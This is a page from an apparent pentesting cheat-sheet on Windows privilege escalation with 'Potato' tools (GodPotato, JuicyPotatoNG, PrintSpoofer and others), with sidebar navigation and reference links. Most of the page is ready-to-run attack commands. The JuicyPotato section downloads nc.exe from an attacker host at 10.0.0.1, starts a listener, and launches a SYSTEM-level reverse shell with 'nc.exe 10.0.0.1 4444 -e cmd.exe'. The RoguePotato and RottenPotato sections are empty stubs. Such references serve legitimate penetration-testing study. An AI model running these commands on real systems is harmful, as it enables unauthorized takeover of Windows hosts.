AD Privilege Escalation
  • Iperius Backup Service Privilege Escalation
  • ManageEngine ADSelfService Plus PrivEsc
  • Mimikatz
  • Outlook Reminder Privilege Escalation
  • UAC Windows Privilege Escalation
  • Windows PrivEsc with Kerberos
  • Windows PrivEsc with LocalPotato
  • Windows PrivEsc with Registry Keys
  • Windows PrivEsc with RemotePotato
  • Windows PrivEsc with SeBackupPrivilege
  • Windows PrivEsc with Unquoted Service Path
  • Windows Privilege Escalation
  • Windows Pivoting
  • AD CS (Active Directory Certificate Services) Pentesting
  • Dumping Windows Password Hashes
  • WSL Pentesting
  • Windows Memory Dump Analysis
  • Windows Remote Code Execution from Linux
  • Windows XML EventLog (EVTX)
  • M365 (Microsoft Office 365) Pentesting
  • Microsoft Outlook Message (.msg)
  • Microsoft Word Pentesting
  • Reading OneDrive Logs
Powered by GitBook
On this page
  • GodPotato
  • JuicyPotato
  • PrintSpoofer
  • RoguePotato
  • RottenPotato
  • References

Windows PrivEsc with LocalPotato

PreviousWindows PrivEsc with KerberosNextWindows PrivEsc with Registry Keys

Last updated 1 year ago

  • SeImpersonatePrivilege

GodPotato -cmd "cmd /c whoami"
Copied!

  • SeImpersonatePrivilege or SeAssignPrimaryToken

Before exploiting, we need to upload nc.exe (it is available from ) to the target machine.

Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe
Copied!

Next start a listener in local machine.

nc -lvnp 4444
Copied!

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"
Copied!

  • SeImpersonatePrivilege

PrintSpoofer.exe -i -c cmd
Copied!

  • SeImpersonatePrivilege

  • SeImpersonatePrivilege

References

GodPotato
Required Privileges
Payloads
https://github.com/BeichenDream/GodPotato
JuicyPotato
Required Privilege
Payloads
https://github.com/antonioCoco/JuicyPotatoNG
https://github.com/ohpe/juicy-potato
here
PrintSpoofer
Required Privilege
Payloads
https://github.com/dievus/printspoofer
RoguePotato
Required Privilege
Payloads
https://github.com/antonioCoco/RoguePotato
RottenPotato
Required Privilege
Payloads
https://github.com/breenmachine/RottenPotatoNG
https://jlajara.gitlab.io/Potatoes_Windows_Privesc
https://github.com/decoder-it/LocalPotato
https://www.localpotato.com/localpotato_html/LocalPotato.html
https://tryhackme.com/room/localpotato
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer
https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
Page cover image